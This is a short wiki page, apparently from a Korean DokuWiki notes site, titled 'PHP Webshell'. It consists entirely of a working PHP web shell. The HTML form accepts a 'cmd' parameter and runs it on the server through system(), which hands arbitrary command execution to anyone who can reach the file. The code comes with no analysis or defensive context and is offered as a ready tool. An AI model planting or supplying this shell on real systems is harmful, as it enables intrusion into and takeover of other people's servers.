사용자 도구

사이트 도구


backup:hack:php:webshell

PHP Webshell

<html><body>
<form method="GET" name="<?php echo basename($_SERVER['PHP_SELF']); ?>">
    <input type="TEXT" name="cmd" autofocus id="cmd" size="80">
    <input type="SUBMIT" value="Execute">
</form>
<pre>
    <?php
        if(isset($_GET['cmd']))
        {
            system($_GET['cmd']);
        }
    ?>
</pre>
</body></html>
backup/hack/php/webshell.txt · 마지막으로 수정됨: 저자 127.0.0.1